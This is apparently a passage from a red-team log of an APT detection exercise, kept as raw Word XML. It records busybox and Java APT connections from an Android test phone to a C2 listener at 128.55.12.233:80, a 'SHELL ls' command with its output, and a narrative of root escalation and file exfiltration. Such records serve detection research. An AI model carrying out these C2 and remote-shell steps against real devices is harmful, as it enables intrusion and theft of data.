        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">walleye:/data/local/tmp $ ./busybox            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0723E704" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">126|walleye:/data/local/tmp $ exit                                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07624785" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">126|walleye:/data/local/tmp # ./busybox   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605E5C3B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F053600" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">255|walleye:/data/local/tmp # su u0_a121                                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F56D6D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">walleye:/data/local/tmp $ ./busybox 128.55.12.33 80                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5373B6C1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">255|walleye:/data/local/tmp $ ./busybox 128.55.12.233 80        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1936E0E2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="695DFE9D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FDB5EF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">255|walleye:/data/local/tmp $ ls -la busybox                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0139770E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-rwx------ 1 u0_a121 u0_a121 134648 2019-05-17 20:39 busybox                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149916C6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">walleye:/data/local/tmp $ chmod 777 busybox                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500B76BB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">walleye:/data/local/tmp $ ls -la busybox                                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D6D03E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-rwxrwxrwx 1 u0_a121 u0_a121 134648 2019-05-17 20:39 busybox                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2EAECC" w14:textId="65FFB6AF" w:rsidR="005A0BE6" w:rsidRPr="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A0BE6">
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">walleye:/data/local/tmp $ ./busybox 128.55.12.233 80    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BDEE8C" w14:textId="6597AB4C" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="249" w:name="_Toc12600140"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>15:43 -- ClearScope 2 -- Lockwatch APK Java APT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="249"/>
    </w:p>
    <w:p w14:paraId="11752A1C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The attacker first took over the ta1-pivot-2 host and deployed C2 capability to that host on the target network.  The user installed and ran a new Java based APT.  The Java APT connected out to 128.55.12.233:80 on the target network for C2.  The APT then used the BinFmt-Elevate driver to gain root access.  Finally, the attacker exfil’ed some files from the phone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DD1EF5" w14:textId="3DE5D5DD" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="250" w:name="_evgbdq8bt1ov" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="251" w:name="_Toc12600141"/>
      <w:bookmarkEnd w:id="250"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="251"/>
    </w:p>
    <w:p w14:paraId="7BF9777A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-pivot-2</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128.55.12.233</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Ubuntu 14.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C697D01" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-clearscope-translate-test</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.114</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Android 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ED689A" w14:textId="291B2472" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="252" w:name="_j2tlzpxbzck6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="253" w:name="_Toc12600142"/>
      <w:bookmarkEnd w:id="252"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="253"/>
    </w:p>
    <w:p w14:paraId="5FD2C298"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Lockwatch APK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33803B94" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Java APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597A67FE" w14:textId="17350091" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="254" w:name="_9w94z9askir9" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="255" w:name="_Toc12600143"/>
      <w:bookmarkEnd w:id="254"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Benign Activity Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="255"/>
    </w:p>
    <w:p w14:paraId="47F46333" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>15:42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058E72E6" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">user@128.55.12.54's password:                                                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DA8D17" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>lockwatch-instr.apk                                                                                100%   41KB  41.2KB/s   00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F63734A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="754A9FBE" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>15:43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADF2F43" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ adb install lockwatch-instr.apk                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F250543" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>adb: failed to install lockwatch-instr.apk: Failure [INSTALL_FAILED_VERSION_DOWNGRADE]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A47D911" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="315F5996" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ adb install -r lockwatch-instr.apk                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FCA570" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">adb: failed to install lockwatch-instr.apk: Failure [INSTALL_FAILED_VERSION_DOWNGRADE]    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44637A47" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>15:44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3756BF4C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ adb uninstall com.bloketech.lockwatch                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F5A7B8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">Success                                                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3000E8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ adb install lockwatch-instr.apk                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289F8D90" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">Success                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C069985" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="743C2C60" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>15:49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437F4D65" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ adb shell am start com.bloketech.lockwatch                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C8F28A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">Starting: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] pkg=com.bloketech.lockwatch }               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090D3941" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Error: Activity not started, unable to resolve Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] flg=0x1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5A3107" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">0000000 pkg=com.bloketech.lockwatch }                                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E17BF26" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ adb shell am start com.bloketech.lockwatch/.MainActivity                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BE44A4" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Starting: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063EBA2E" w14:textId="647181E4" w:rsidR="00A351B2" w:rsidRPr="00650FDF" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>cmp=com.blok</w:t>
      </w:r>
      <w:r w:rsidR="00650FDF">
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>etech.lockwatch/.MainActivity }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4B042B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="256" w:name="_Toc12600144"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="256"/>
    </w:p>
    <w:p w14:paraId="7AEB9379" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A858F74" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@ta51-pivot-2:~/tmp/JavaApt$ sudo ./c2.py 80                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DD30C7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">listening on 10.0.6.183                                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A521C1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">use `sudo lsof -i` to find problem process when bind fails                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0CAC53" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Got connection from ('128.55.12.166', 40198)                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633BC35E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL ls                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C2D77A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL ls"                                                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD10D21" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied: acct                                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF19277" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">bugreports                                                                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578CB339" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cache                                                                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC4834C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">charger                                                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEDE289" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">config                                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D187922" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">d                                                                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEC059D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">data                                                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA01FF8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">default.prop                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF72EF6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dev                                                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D139E2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dsp                                                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A65483" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">etc                                                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52051562" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">firmware                                                                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281241BF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">init                                                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F70FA80" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">init.environ.rc                                                                                                                      </w:t>
      </w:r>
    </w:p>
